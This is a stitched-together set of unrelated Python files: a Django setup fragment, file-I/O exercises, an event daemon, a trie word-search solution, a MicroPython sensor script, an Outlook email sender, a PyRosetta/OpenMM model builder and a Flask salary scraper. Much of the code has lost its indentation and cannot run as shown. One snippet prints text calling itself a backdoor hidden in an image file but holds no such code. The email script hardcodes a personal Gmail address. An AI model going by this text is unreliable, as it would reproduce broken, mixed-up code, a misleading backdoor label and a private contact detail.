    license='free to use without permission, but only at your own risk',
description='base for my Django projects',
zip_safe=False,
install_requires = [
'django',
'django-reversion',
# 'django-profiles',
# 'django-uni-forms',
#todo
],
)
|
import sys
print("zad1")
numbers = []
for i in range(1, 100):
    if i % 4 == 0:
        numbers.append(i)
file1 = open("ex1.txt", "w")
file1.write(str(numbers))
file1.close()
print("\nzad2")
file1 = open("ex1.txt","r")
divisible_by_4 = file1.read()
print(divisible_by_4)
file1.close()
print("\nzad3")
text = "\nNumbers divisible by 4."
with open("ex1.txt", "a+") as file1:
file1.write(text)
print(text)
|
import argparse
import json
import logging
import os
import socket
import time
from .dispatcher import Dispatcher
from .eventlog import EventLog
from .logs import setup_logs, log_globals
from .utils import try_call_except_traceback
def main(argv=None):
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--verbose', action='store_true')
parser.add_argument('-p', '--plugin-dir', action='append')
parser.add_argument('-s', '--state-path')
parser.add_argument('-l', '--log-dir')
parser.add_argument('-e', '--email-errors', action='append')
args = parser.parse_args(argv)
# Set a global socket timeout, so that nothing socket related will ever
# lock us up. This is likely to cause a few extra problems, but we can
# deal with them.
socket.setdefaulttimeout(60.1)
smtp_args = (
'localhost',
'sgevents@mail.westernx',
args.email_errors,
'SGEvents on %s' % socket.gethostname(),
) if args.email_errors else None
setup_logs(debug=args.verbose, file_dir=args.log_dir, smtp_args=smtp_args)
state = {}
state_path = args.state_path
if state_path:
state_dir = os.path.dirname(os.path.abspath(state_path))
if not os.path.exists(state_dir):
os.makedirs(state_dir)
if os.path.exists(state_path):
try:
state = json.load(open(state_path))
except ValueError as e:
                print(e)
dispatcher = Dispatcher()
for plugin_dir in args.plugin_dir or ():
dispatcher.load_plugins(plugin_dir)
event_log = EventLog(extra_fields=dispatcher.get_extra_fields(), last_id=state.get('last_id'))
def on_event(event):
try:
dispatcher.dispatch(event)
finally:
if state_path:
state['last_id'] = event.id
with open(state_path, 'w') as fh:
fh.write(json.dumps(state))
# Be hyper-vigilant.
while True:
try_call_except_traceback(event_log.process_events_forever, on_event)
time.sleep(10)
if __name__ == '__main__':
# We REALLY don't want to be using the cache for this stuff.
os.environ.pop('SGCACHE', None)
main()
|
import datetime
print(datetime.datetime.now())
print("Put your Python script here.")
print("This is a simple backdoor in an image file; execute it with Python.")
|
# Given a 2D board and a list of words from the dictionary, find all words in the board.
#
# Each word must be constructed from letters of sequentially adjacent cell, where "adjacent" cells are those horizontally or vertically neighboring. The same letter cell may not be used more than once in a word.
#
# Example:
#
# Input:
# words = ["oath","pea","eat","rain"] and board =
# [
# ['o','a','a','n'],
# ['e','t','a','e'],
# ['i','h','k','r'],
# ['i','f','l','v']
# ]
#
# Output: ["eat","oath"]
# Note:
# You may assume that all inputs are consist of lowercase letters a-z.
import collections
class TrieNode():
def __init__(self):
self.children = collections.defaultdict(TrieNode)
self.isWord = False
class Trie():
def __init__(self):
self.root = TrieNode()
def insert(self, word):
node = self.root
for w in word:
node = node.children[w]
node.isWord = True
def search(self, word):
node = self.root
for w in word:
node = node.children.get(w)
if not node:
return False
return node.isWord
class Solution(object):
def findWords(self, board, words):
"""
:type board: List[List[str]]
:type words: List[str]
:rtype: List[str]
"""
res = []
trie = Trie()
node = trie.root
for word in words:
trie.insert(word)
for i in range(len(board)):
for j in range(len(board[0])):
self.dfs(board, node, i, j, '', res)
return res
def dfs(self, board, node, i, j, path, res):
if node.isWord:
res.append(path)
node.isWord = False
if i < 0 or i >= len(board) or j < 0 or j >= len(board[0]):
return
t = board[i][j]
node = node.children.get(t)
if not node:
return
board[i][j] = ''
        for x, y in [(i - 1, j), (i + 1, j), (i, j - 1), (i, j + 1)]:
            self.dfs(board, node, x, y, path + t, res)
board[i][j] = t
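# A minimal driver (hypothetical, not part of the original file) exercising the
# class above with the example board and word list from the problem statement:
if __name__ == '__main__':
    board = [
        ['o', 'a', 'a', 'n'],
        ['e', 't', 'a', 'e'],
        ['i', 'h', 'k', 'r'],
        ['i', 'f', 'l', 'v'],
    ]
    words = ["oath", "pea", "eat", "rain"]
    print(sorted(Solution().findWords(board, words)))  # expected: ['eat', 'oath']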
|
from max6675 import MAX6675
from machine import Pin
import time
so = Pin(12, Pin.IN)
sck = Pin(14, Pin.OUT)
cs = Pin(16, Pin.OUT)
thermocouple = MAX6675(sck, cs, so)  # avoid shadowing the built-in max()
for _ in range(10):
    print(thermocouple.read())
time.sleep(1)
|
import win32com.client as win32
# Create the Outlook integration
outlook = win32.Dispatch('outlook.application')
# Create an email
email = outlook.CreateItem(0)
# Configure the email fields
email.To = "josievinileite@gmail.com"
email.Subject = "Automation test"
email.HTMLBody = f"""
<h1>Automating emails with Python</h1>
"""
# Add an attachment
anexo = "C:/Users/vinicius/Desktop/teste.xlsx"
email.Attachments.Add(anexo)
# Send the email
email.Send()
print("The email was sent successfully")
|
import os, shutil, datetime
import cg_pyrosetta
import pyrosetta
import mdtraj as md
from simtk import unit
import foldamers
from foldamers.utilities.iotools import write_pdbfile_without_topology
from foldamers.utilities.util import *
from cg_openmm.simulation.tools import *
from cg_openmm.build.cg_build import *
from foldamers.cg_model.cgmodel import *
# Identify the Rosetta database directory
pyrosetta_database_path = pyrosetta._rosetta_database_from_env()
def get_bonded_particle_list(residue):
"""
Returns the list of names for particles that are bonded together in this residue.
Parameters
----------
residue: A dictionary containing information about the particles in a residue/monomer type
Returns
-------
bonded_list: A list of the particles that are bonded together in this residue type.
List([[atom_1_name(str),atom_2_name(str)]])
"""
bonded_list = []
atom_1_name = str("BB1")
    for backbone_bead in range(residue['backbone_length']):
if backbone_bead != 0:
atom_2_name = str("BB"+str(backbone_bead+1))
bonded_list.append([atom_1_name,atom_2_name])
atom_1_name = atom_2_name
if backbone_bead in residue['sidechain_positions']:
            for sidechain_bead in range(residue['sidechain_length']):
atom_2_name = str("SC"+str(sidechain_bead+1))
bonded_list.append([atom_1_name,atom_2_name])
atom_1_name = atom_2_name
if residue['sidechain_length'] == 1:
atom_2_name = str("VIRT")
bonded_list.append([atom_1_name,atom_2_name])
atom_1_name = str("BB"+str(backbone_bead+1))
return(bonded_list)
def get_monomer_internal_coordinates(cgmodel,monomer_type):
"""
    Returns a list of internal coordinates for a monomer/residue, given a cgmodel class object and a monomer_type dictionary. (Used to construct a residue .params file for PyRosetta.)
Parameters
----------
cgmodel: CGModel() class object
monomer_type: A dictionary containing information about the particles in a residue/monomer type
Returns
-------
internal_coordinates: A list of internal coordinates for 'monomer_type'
List([strings])
"""
# Building internal coordinates for residue .params files in PyRosetta using the example here:
# https://www.rosettacommons.org/docs/latest/rosetta_basics/file_types/Residue-Params-file
monomer_positions = cgmodel.positions[0:monomer_type['num_beads']]
internal_coordinates = []
bonded_particle_list = get_bonded_particle_list(monomer_type)
torsion_index = 0
# Build monomer internal coordinates by iterating over the list of torsions in the cgmodel
for torsion in cgmodel.torsion_list:
        if all(particle_index < monomer_type['num_beads'] for particle_index in torsion):
# Construct a list of atoms from which to build an internal coordinate line
if torsion_index == 0:
atom_a1,atom_a2,atom_a3,atom_a4 = cgmodel.particle_list[torsion[2]],cgmodel.particle_list[torsion[1]],cgmodel.particle_list[torsion[0]],cgmodel.particle_list[torsion[0]]
else:
atom_a1,atom_a2,atom_a3,atom_a4 = cgmodel.particle_list[torsion[3]],cgmodel.particle_list[torsion[2]],cgmodel.particle_list[torsion[1]],cgmodel.particle_list[torsion[0]]
# Determine the bond length for this internal coordinate line
if atom_a3 == atom_a4:
bond_length = 0.0
else:
bond_length = get_bond_length_from_names(cgmodel,atom_a3,atom_a4)
# Determine theta for this internal coordinate line
if atom_a3 == atom_a4:
theta = 0.0
if atom_a2 == atom_a4:
theta = 180.0
if atom_a3 != atom_a4 and atom_a2 != atom_a4:
theta = 180.0 - get_bond_angle_from_names(cgmodel,atom_a4,atom_a3,atom_a2)
# Determine phi for this internal coordinate line
            if len(torsion) > len(set(torsion)):
phi = 0.0
else:
phi = get_torsion_from_names(cgmodel,atom_a4,atom_a3,atom_a2,atom_a1)
# Construct a line from the coordinate values chosen.
line_list = ['ICOOR_INTERNAL ',atom_a4,phi,theta,bond_length,atom_a3,atom_a2,atom_a1]
            line = '%18s%4s %10s %10s %9s %4s %4s %4s' % tuple(line_list)
internal_coordinates.append(line)
torsion_index = torsion_index + 1
return(internal_coordinates)
def remove_existing_atom_types(atom_properties_file,list_of_atoms_to_remove):
"""
Given a 'list_of_atoms_to_remove' and the path to a PyRosetta database file containing atom properties ('atom_properties.txt'), this function removes old atom types.
Parameters
----------
atom_properties_file: Path to the PyRosetta database file containing atom type properties ('atom_properties.txt')
list_of_atoms_to_remove: List of atom types to remove from the database.
"""
file_obj = open(atom_properties_file,'r')
lines = file_obj.readlines()
file_obj.close()
file_obj = open(atom_properties_file,'w')
for line in lines:
atom_type = line.split(' ')[0]
if atom_type not in list_of_atoms_to_remove:
file_obj.write(line)
file_obj.close()
return
def get_existing_atom_types(atom_properties_file):
"""
Given the path to a PyRosetta database file, 'atom_properties.txt', this function reads the file and returns a list of atom type names.
Parameters
----------
atom_properties_file: Path to the PyRosetta database file containing atom type properties ('atom_properties.txt')
Returns
-------
existing_atom_types_list: List of existing atom types.
"""
existing_atom_types_list = []
    file_obj = open(atom_properties_file,'r')
lines = file_obj.readlines()
for line in lines:
if line[0] != '#':
atom_type = line.split(' ')[0]
existing_atom_types_list.append(atom_type)
return(existing_atom_types_list)
def write_mm_atom_properties_txt(cgmodel,list_of_atoms_to_add):
"""
Given a cgmodel and a 'list_of_atoms_to_add', this function adds the atoms to 'mm_atom_properties.txt'.
Parameters
----------
cgmodel: CGModel() class object
list_of_atoms_to_add: List of atom types to write to 'mm_atom_properties.txt'
List([ strings ])
"""
mm_atom_type_sets_directory = str(str(pyrosetta_database_path)+"mm_atom_type_sets/coarse_grain")
if not os.path.exists(mm_atom_type_sets_directory): os.mkdir(mm_atom_type_sets_directory)
    atom_properties_file = str(str(mm_atom_type_sets_directory)+"/mm_atom_properties.txt")
if os.path.exists(atom_properties_file):
        existing_atom_types = get_existing_atom_types(atom_properties_file)
file_obj = open(atom_properties_file,'a')
        for atom_type in list_of_atoms_to_add:
            if atom_type in existing_atom_types:
                print("WARNING: found an existing atom type with the same name in:\n")
                print(str(str(atom_properties_file)+"\n"))
                print("Removing the existing atom type definition from 'mm_atom_properties.txt'")
                remove_existing_atom_types(atom_properties_file,[atom_type])
else:
file_obj = open(atom_properties_file,'w')
file_obj.write("NAME ATOM LJ_RADIUS LJ_WDEPTH LK_DGFREE LK_LAMBDA LK_VOLUME\n")
file_obj.write("## Coarse grained residue types to follow\n")
    for atom_type in list_of_atoms_to_add:
        if len(atom_type) > 4:
            print("ERROR: an atom type with a name longer than 4 characters has been defined for this model.\n")
            print("PyRosetta syntax requires that all atom types have names with four characters or fewer.")
            exit()
        particle_type = get_particle_type(cgmodel,particle_index=-1,particle_name=atom_type)
        sigma = get_sigma(cgmodel,particle_index=-1,particle_type=particle_type)
        epsilon = get_epsilon(cgmodel,particle_index=-1,particle_type=particle_type)
        lk_dgfree = 0.0000
        lk_lambda = 3.5000
        lk_volume = 0.0000
        symbol = 'X'
        comments = ""
        line_list = [atom_type,symbol,sigma,epsilon,lk_dgfree,lk_lambda,lk_volume,comments]
        line = '%4s %1s %9s %9s %9s %6s %9s %s' % tuple(line_list)
        file_obj.write(line+"\n")
    file_obj.close()
return
def write_atom_properties_txt(cgmodel,list_of_atoms_to_add):
"""
Given a cgmodel and a 'list_of_atoms_to_add', this functions writes the atoms to 'atom_properties.txt' in the PyRosetta database.
Parameters
----------
cgmodel: CGModel() class object
list_of_atoms_to_add: List of atom types to write to 'atom_properties.txt'
List([ strings ])
"""
atom_type_sets_directory = str(str(pyrosetta_database_path)+"atom_type_sets/coarse_grain")
if not os.path.exists(atom_type_sets_directory): os.mkdir(atom_type_sets_directory)
atom_properties_file = str(str(atom_type_sets_directory)+"/atom_properties.txt")
if os.path.exists(atom_properties_file):
existing_atom_types = get_existing_atom_types(atom_properties_file)
file_obj = open(atom_properties_file,'a')
        for atom_type in list_of_atoms_to_add:
            if atom_type in existing_atom_types:
                print("WARNING: found an existing atom type with the same name in:\n")
                print(str(str(atom_properties_file)+"\n"))
                print("Removing the existing atom type definition from 'atom_properties.txt'")
                remove_existing_atom_types(atom_properties_file,[atom_type])
else:
file_obj = open(atom_properties_file,'w')
file_obj.write("NAME ATOM LJ_RADIUS LJ_WDEPTH LK_DGFREE LK_LAMBDA LK_VOLUME\n")
file_obj.write("## Coarse grained residue types to follow\n")
    for atom_type in list_of_atoms_to_add:
        if len(atom_type) > 4:
            print("ERROR: an atom type with a name longer than 4 characters has been defined for this model.\n")
            print("PyRosetta syntax requires that all atom types have names with four characters or fewer.")
            exit()
        particle_type = get_particle_type(cgmodel,particle_index=-1,particle_name=atom_type)
        sigma = get_sigma(cgmodel,particle_index=-1,particle_type=particle_type)
        epsilon = get_epsilon(cgmodel,particle_index=-1,particle_type=particle_type)
        lk_dgfree = 0.0000
        lk_lambda = 3.5000
        lk_volume = 0.0000
        symbol = 'X'
        comments = ""
        line_list = [atom_type,symbol,sigma,epsilon,lk_dgfree,lk_lambda,lk_volume,comments]
        line = '%4s %1s %9s %9s %9s %6s %9s %s' % tuple(line_list)
        file_obj.write(line+"\n")
    file_obj.close()
return
def build_patches(cgmodel):
"""
    Builds the terminal-variant patches for coarse grained residue types in the PyRosetta database.
    Parameters
    ----------
    cgmodel: CGModel() class object
"""
residue_type_sets_directory = str(str(pyrosetta_database_path)+"residue_type_sets/coarse_grain")
if not os.path.exists(residue_type_sets_directory):
os.mkdir(residue_type_sets_directory)
if not os.path.exists(str(str(residue_type_sets_directory)+"/patches")):
os.mkdir(str(str(residue_type_sets_directory)+"/patches"))
patches_list = ['LOWER_TERMINUS_VARIANT','UPPER_TERMINUS_VARIANT']
return
def remove_existing_residue_types(residue_types_txt_file,list_of_residue_types_to_remove):
"""
Given a 'list_of_residue_types_to_remove', and a 'residue_types_txt_file', this function will open the residue types file, and remove the target residue types.
Parameters
----------
residue_types_txt_file: The path to a PyRosetta residue types file ('residue_types.txt')
list_of_residue_types_to_remove: A list of residue type names to remove from 'residue_types.txt'
"""
file_obj = open(residue_types_txt_file,'r')
lines = file_obj.readlines()
file_obj.close()
file_obj = open(residue_types_txt_file,'w')
for line in lines:
if line[0] != '#':
if '.params' in line:
residue_type = line.split('/')[-1].split('.params')[0]
if residue_type not in list_of_residue_types_to_remove:
file_obj.write(line)
file_obj.close()
return
def get_existing_residue_types(residue_types_txt_file):
"""
Given a 'residue_types_txt_file', this function gets a list of residue types that are in the file.
(Commented out lines/residue types are ignored.)
Parameters
----------
    residue_types_txt_file: The path to a PyRosetta residue types file ('residue_types.txt')
Returns
-------
existing_residue_types_list: A list of residue types that are currently in 'residue_types.txt'.
"""
existing_residue_types_list = []
file_obj = open(residue_types_txt_file,'r')
lines = file_obj.readlines()
for line in lines:
if line[0] != '#':
if '.params' in line:
residue_type = line.split('/')[-1].split('.params')[0]
existing_residue_types_list.append(residue_type)
return(existing_residue_types_list)
def write_residue_types_txt(residue_types_list,residue_type_sets_directory):
"""
    Given a 'residue_type_sets_directory' and a 'residue_types_list', this function writes the residue types to 'residue_types.txt' (creating the file if it doesn't already exist, and appending the residue types to the file if it does exist).
Parameters
----------
residue_types_sets_directory: The path to a directory containing a list of residue types
residue_types_list: A list of residue types to write/add to 'residue_types.txt'.
"""
    file_name = str(str(residue_type_sets_directory)+"/residue_types.txt")
if os.path.exists(file_name):
existing_residue_types = get_existing_residue_types(file_name)
file_obj = open(file_name,'a')
file_obj.write("\n")
file_obj.write("## Coarse grained residue types to follow\n")
for residue_type in residue_types_list:
if residue_type in existing_residue_types:
print("WARNING: found an existing residue type set in the PyRosetta database folder:\n")
print(str(str(residue_type_sets_directory.split('/residue_types')[0])+"\n"))
print("with the same name as a residue you wish to add:"+str(str(residue_type)+"\n"))
print("Removing the existing residue type set's path from 'residue_type_sets.txt'")
remove_existing_residue_types(file_name,[residue_type])
else:
file_obj = open(file_name,'w')
file_obj.write("## Define atom and mm type sets\n")
file_obj.write("TYPE_SET_MODE coarse_grain\n")
file_obj.write("ATOM_TYPE_SET coarse_grain\n")
file_obj.write("ELEMENT_SET coarse_grain\n")
file_obj.write("MM_ATOM_TYPE_SET coarse_grain\n")
file_obj.write("ORBITAL_TYPE_SET coarse_grain\n")
file_obj.write("##\n")
file_obj.write("\n")
file_obj.write("## Coarse grained residue types to follow\n")
for residue_type in residue_types_list:
file_obj.write("residue_types/"+str(residue_type)+".params")
file_obj.close()
return
def build_params_files(cgmodel):
"""
Given a cgmodel class object, this function writes '.params' files for all unique residue types in the class.
Parameters
----------
cgmodel: CGModel() class object
"""
print(pyrosetta_database_path)
residue_type_sets_directory = str(str(pyrosetta_database_path)+"/chemical/residue_type_sets/coarse_grain")
if not os.path.exists(residue_type_sets_directory): os.mkdir(residue_type_sets_directory)
if not os.path.exists(str(str(residue_type_sets_directory)+"/residue_types")):
os.mkdir(str(str(residue_type_sets_directory)+"/residue_types"))
residue_code_options = ['A','B','C','D','E','F']
residue_code_list = []
residue_code_index = 0
residue_code = residue_code_options[residue_code_index]
for residue in cgmodel.monomer_types:
residue_type_name = str("CG"+str(residue['backbone_length'])+str(residue['sidechain_length']))
while residue_code in residue_code_list:
residue_code_index = residue_code_index + 1
residue_code = residue_code_options[residue_code_index]
        residue_code_list.append(residue_code)
        file_name = str(str(residue_code)+".params")
file_obj = open(file_name,'w')
file_obj.write("# Rosetta residue topology file\n")
file_obj.write("# Authors: Lenny T. Fobe, Garrett A. Meek\n")
file_obj.write("# ( Research group of Professor Michael R. Shirts )\n")
file_obj.write("# Dept. of Chemical and Biological Engineering\n")
file_obj.write("# University of Colorado Boulder\n")
file_obj.write("# This file was written on: "+str(datetime.datetime.today())+"\n")
file_obj.write("\n")
file_obj.write("NAME "+str(residue_type_name)+"\n")
file_obj.write("IO_STRING "+str(residue_type_name)+" "+str(residue_code)+"\n")
file_obj.write("TYPE POLYMER\n")
file_obj.write("\n")
file_obj.write(str("VARIANT\n"))
file_obj.write("\n")
for backbone_bead in range(residue['backbone_length']):
atom_name = str("BB"+str(backbone_bead+1))
file_obj.write("ATOM "+str(atom_name)+" VIRT X 0.0\n")
            if backbone_bead in residue['sidechain_positions']:
for sidechain_bead in range(residue['sidechain_length']):
atom_name = str("SC"+str(sidechain_bead+1))
file_obj.write("ATOM "+str(atom_name)+" VIRT X 0.0\n")
if residue['sidechain_length'] == 1:
file_obj.write("ATOM VIRT VIRT X 0.0\n")
file_obj.write("\n")
upper_connect = str("BB"+str(residue['backbone_length']))
file_obj.write("LOWER CONNECT BB1\n")
file_obj.write("UPPER_CONNECT "+str(upper_connect)+"\n")
atom_1_name = str("BB1")
for backbone_bead in range(residue['backbone_length']):
if backbone_bead != 0:
atom_2_name = str("BB"+str(backbone_bead+1))
file_obj.write("BOND "+str(atom_1_name)+" "+str(atom_2_name)+"\n")
atom_1_name = atom_2_name
            if backbone_bead in residue['sidechain_positions']:
for sidechain_bead in range(residue['sidechain_length']):
atom_2_name = str("SC"+str(sidechain_bead+1))
file_obj.write("BOND "+str(atom_1_name)+" "+str(atom_2_name)+"\n")
atom_1_name = atom_2_name
if residue['sidechain_length'] == 1:
atom_2_name = str("VIRT")
file_obj.write("BOND "+str(atom_1_name)+" "+str(atom_2_name)+"\n")
atom_1_name = str("BB"+str(backbone_bead+1))
file_obj.write("\n")
file_obj.write("FIRST_SIDECHAIN_ATOM SC1\n")
file_obj.write("PROPERTIES\n")
file_obj.write("\n")
file_obj.close()
shutil.move(file_name,str(str(residue_type_sets_directory)+"/residue_types/"+str(file_name)))
write_residue_types_txt(residue_code_list,residue_type_sets_directory)
return
def build_scorefxn(cgmodel):
"""
Given a cgmodel class object, this function uses its definitions to build a PyRosetta scoring function.
(Used to confirm energetic agreement between PyRosetta and OpenMM for identical model parameters and an identical structural ensemble.)
Parameters
----------
cgmodel: CGModel() class object
Returns
-------
scorefxn: A PyRosetta ScoreFunction() class object, containing all scoring function components that are defined/requested within the cgmodel() class object.
"""
scorefxn = pyrosetta.ScoreFunction()
scorefxn.set_weight(pyrosetta.rosetta.core.scoring.fa_atr, 1)
scorefxn.set_weight(pyrosetta.rosetta.core.scoring.fa_rep, 1)
scorefxn.set_weight(pyrosetta.rosetta.core.scoring.fa_intra_atr, 1)
scorefxn.set_weight(pyrosetta.rosetta.core.scoring.fa_intra_rep, 1)
cg_pyrosetta.change_parameters.changeTorsionParameters(
{'CG1 CG1 CG1 CG1':[3,3,0],
'CG2 CG1 CG1 CG2':[0,0,0],
'CG2 CG1 CG1 CG1':[0,0,0],
'X CG2 CG1 CG1':[0,0,0]},
)
cg_pyrosetta.change_parameters.changeAngleParameters(
{'CG1 CG1 CG1':[2,120],
'CG2 CG1 CG1':[2,120],
'CG1 CG1 CG2':[0,0],
'X CG2 CG1':[0,0]}
)
# scorefxn.set_weight(pyrosetta.rosetta.core.scoring.mm_twist, 0.1)
return(scorefxn)
def compare_pose_scores(scorefxn,pose_1,pose_2,compare_pdb_sequence=True):
"""
Given two PyRosetta poses ('pose_1' and 'pose_2') and a scoring function ('scorefxn'), this function compares their scores to confirm agreement.
(Can also be used to confirm that the scores for poses generated from the sequence and from a PDB file are identical, in order to validate our procedure for building PyRosetta '.params' files from the cgmodel class object.)
Parameters
----------
scorefxn: A PyRosetta scoring function
    pose_1: A PyRosetta pose (the pose built from a PDB file if 'compare_pdb_sequence'=True)
    pose_2: A PyRosetta pose (the pose built from a sequence if 'compare_pdb_sequence'=True)
compare_pdb_sequence: A logical variable determining whether this score comparison is meant to determine agreement between poses built from a PDB file and a sequence.
"""
if compare_pdb_sequence:
        pdb_score = scorefxn(pose_1)
        sequence_score = scorefxn(pose_2)
if sequence_score != pdb_score:
print("WARNING: Getting different scores when the pose is built from a sequence and from a PDB file.\n")
print("The score when building a pose from the sequence is: "+str(sequence_score)+"\n")
print("The score when building a pose from the PDB file is: "+str(pdb_score)+"\n")
else:
print("The scores are identical when a pose is built from a PDB file and from the polymer sequence.\n")
else:
        score_1 = scorefxn(pose_1)
        score_2 = scorefxn(pose_2)
if score_1 != score_2:
print("The scores for these poses are different:\n")
print("The score for pose 1 is:"+str(score_1)+"\n")
print("The score for pose 2 is:"+str(score_2)+"\n")
else:
print("The scores for these poses are the same.\n")
return
def compare_openmm_energy_pyrosetta_score(cgmodel):
"""
Given a cgmodel class object, this function determines if PyRosetta and OpenMM give the same score/energy with identical model settings.
Parameters
----------
cgmodel: Coarse grained model class object.
"""
#build_params_files(cgmodel)
pyrosetta.init()
pyrosetta_sequence = ''.join([str('X['+str(monomer['monomer_name'])+']') for monomer in cgmodel.sequence])
# Build a PyRosetta pose
pose = pyrosetta.pose_from_sequence(pyrosetta_sequence)
# Define a PyRosetta scoring function
pose.dump_pdb("test_pyrosetta.pdb")
scorefxn = build_scorefxn(cgmodel)
cgmodel.positions = PDBFile("test_pyrosetta.pdb").getPositions()
cgmodel.topology = build_topology(cgmodel)
write_pdbfile_without_topology(cgmodel,"test_foldamers.pdb")
# get the PyRosetta score
score = scorefxn(pose)
# Build an OpenMM simulation object so that we can calculate the energy using a simulation Context()
temperature = 300.0 * unit.kelvin
simulation = build_mm_simulation(cgmodel.topology,cgmodel.system,cgmodel.positions,temperature=temperature,simulation_time_step=5.0 * unit.femtosecond)
# Obtain a state for our simulation context
energy = simulation.context.getState(getEnergy=True).getPotentialEnergy()
print("The PyRosetta score is: "+str(score)+"\n")
print("The OpenMM potential energy is: "+str(energy)+"\n")
return
# Set values for the parameters in our coarse grained model:
polymer_length=12
backbone_lengths=[1]
sidechain_lengths=[1]
sidechain_positions=[0]
include_bond_forces=False
include_bond_angle_forces=True
include_nonbonded_forces=True
include_torsion_forces=True
constrain_bonds=True
# Particle properties
mass = 100.0 * unit.amu
masses = {'backbone_bead_masses': mass, 'sidechain_bead_masses': mass}
bond_length = 1.0 * unit.angstrom
bond_lengths = {'bb_bb_bond_length': bond_length,'bb_sc_bond_length': bond_length,'sc_sc_bond_length': bond_length}
bond_force_constant = 0.0 * unit.kilocalorie_per_mole / unit.nanometer / unit.nanometer
bond_force_constants = {'bb_bb_bond_k': bond_force_constant, 'bb_sc_bond_k': bond_force_constant, 'sc_sc_bond_k': bond_force_constant}
sigma = 1.0 * bond_length
sigmas = {'bb_bb_sigma': sigma,'sc_sc_sigma': sigma}
epsilon = 0.2 * unit.kilocalorie_per_mole
epsilons = {'bb_bb_eps': epsilon,'sc_sc_eps': epsilon}
# Bond angle properties
bond_angle_force_constant = 2 * unit.kilocalorie_per_mole / unit.radian / unit.radian
bond_angle_force_constants = {'bb_bb_bb_angle_k': bond_angle_force_constant,'bb_bb_sc_angle_k': bond_angle_force_constant}
equil_bond_angle = 120.0*(3.141/180.0)
equil_bond_angles = {'bb_bb_bb_angle_0': equil_bond_angle,'bb_bb_sc_angle_0': equil_bond_angle}
# Torsion properties
torsion_force_constant = 3
torsion_force_constants = {'bb_bb_bb_bb_torsion_k': torsion_force_constant,'sc_bb_bb_sc_torsion_k': 0.0,'bb_bb_bb_sc_torsion_k': 0.0,'sc_bb_bb_bb_torsion_k': 0.0}
equil_torsion_angle = 0.0*(3.141/180.0)
equil_torsion_angles = {'bb_bb_bb_bb_torsion_0': equil_torsion_angle,'sc_bb_bb_sc_torsion_0': 0.0,'bb_bb_bb_sc_torsion_0': 0.0,'sc_bb_bb_bb_torsion_0': 0.0}
#Adjust the nonbonded exclusion rules and interaction weights to match the Rosetta scoring function
rosetta_scoring = True
# Build a coarse grained model
cgmodel = CGModel(polymer_length=polymer_length,backbone_lengths=backbone_lengths,sidechain_lengths=sidechain_lengths,sidechain_positions=sidechain_positions,masses=masses,sigmas=sigmas,epsilons=epsilons,bond_lengths=bond_lengths,bond_force_constants=bond_force_constants,bond_angle_force_constants=bond_angle_force_constants,torsion_force_constants=torsion_force_constants,equil_bond_angles=equil_bond_angles,equil_torsion_angles=equil_torsion_angles,include_nonbonded_forces=include_nonbonded_forces,include_bond_forces=include_bond_forces,include_bond_angle_forces=include_bond_angle_forces,include_torsion_forces=include_torsion_forces,constrain_bonds=constrain_bonds,rosetta_scoring=rosetta_scoring)
# Compare OpenMM and PyRosetta energies
# (This function is also where we initialize new residue/monomer
# types in the PyRosetta database.)
compare_openmm_energy_pyrosetta_score(cgmodel)
# Test our ability to write a PDB file using our pose and new residue type sets.
exit()
|
from django.core.management.base import BaseCommand
from data_refinery_common.models import ComputationalResultAnnotation, Experiment
class Command(BaseCommand):
def handle(self, *args, **options):
organism_ids = list(
ComputationalResultAnnotation.objects.filter(data__is_qn=True).values_list(
"data__organism_id", flat=True
)
)
for experiment in Experiment.objects.all():
experiment.num_downloadable_samples = experiment.samples.filter(
is_processed=True, organism__id__in=organism_ids
).count()
experiment.save()
print("Updated the num_downloadable_samples field on all experiment objects.")
|
from flask import Flask, render_template, request
from sqlalchemy import Column, Integer, String, Float, create_engine, ForeignKey, Table
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import requests
app = Flask(__name__)
@app.route('/')
@app.route('/main')
def main():
return render_template('main.html')
@app.route('/contacts')
def contacts():
return render_template('contacts.html')
@app.route('/city_form', methods=['POST'])
def city_form():
city = request.form['city']
prof = request.form['prof']
    string = prof + ' AND ' + city
URL = 'https://api.hh.ru/vacancies'
params = {'text': string,
'only_with_salary': True,
'page': 1,
'per_page': 20}
result = requests.get(URL, params=params).json()
found_vacancies = result['found']
pages = result['pages']
salary_from = []
salary_to = []
    print('Found {} vacancies across {} pages'.format(result['found'], result['pages']))
for i in range(1, pages):
URL = 'https://api.hh.ru/vacancies'
params = {'text': string,
'only_with_salary': True,
'page': i,
'per_page': 20}
result = requests.get(URL, params=params).json()
items = result['items']
for i in items:
salary = i['salary']
sal_from = salary['from']
sal_to = salary['to']
            if sal_from is not None: salary_from.append(sal_from)
            if sal_to is not None: salary_to.append(sal_to)
salary_from = int(sum(salary_from) / len(salary_from))
salary_to = int(sum(salary_to) / len(salary_to))
data = {'city': city,
'prof': prof,
'salary_from': salary_from,
'salary_to': salary_to}
engine = create_engine('sqlite:///orm1.sqlite', echo=False)
Base = declarative_base()
class HH_request(Base):
__tablename__ = 'HH_request_new'
id = Column(Integer, primary_key=True)
city = Column(String)
prof = Column(String)
salary_from = Column(Integer)
salary_to = Column(Integer)
def __init__(self, city, prof, salary_from, salary_to):
self.city = city
self.prof = prof
self.salary_from = salary_from
self.salary_to = salary_to
def __str__(self):
return f'{self.city},{self.prof},{self.salary_from},{self.salary_to}'
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
HH_request_1 = HH_request(city, prof, salary_from, salary_to)
session.add(HH_request_1)
session.commit()
return render_template('city_form.html', data=data)
@app.route('/hands_to_db')
def hands_to_db():
return render_template('hands_to_db.html')
@app.route('/hands_to_db_rec', methods=['POST'])
def hands_to_db_rec():
city_hotelka = request.form['City']
prof_hotelka = request.form['Prof']
salary_from_hotelka = request.form['Salary_from']
salary_to_hotelka = request.form['Salary_to']
data = {'city': city_hotelka,
'prof': prof_hotelka,
'salary_from': salary_from_hotelka,
'salary_to': salary_to_hotelka}
engine = create_engine('sqlite:///orm1.sqlite', echo=False)
Base = declarative_base()
class HH_hotelka(Base):
__tablename__ = 'HH_hotelka'
id = Column(Integer, primary_key=True)
city_hotelka = Column(String)
prof_hotelka = Column(String)
salary_from_hotelka = Column(Integer)
salary_to_hotelka = Column(Integer)
def __init__(self, city_hotelka, prof_hotelka, salary_from_hotelka, salary_to_hotelka):
self.city_hotelka = city_hotelka
self.prof_hotelka = prof_hotelka
self.salary_from_hotelka = salary_from_hotelka
self.salary_to_hotelka = salary_to_hotelka
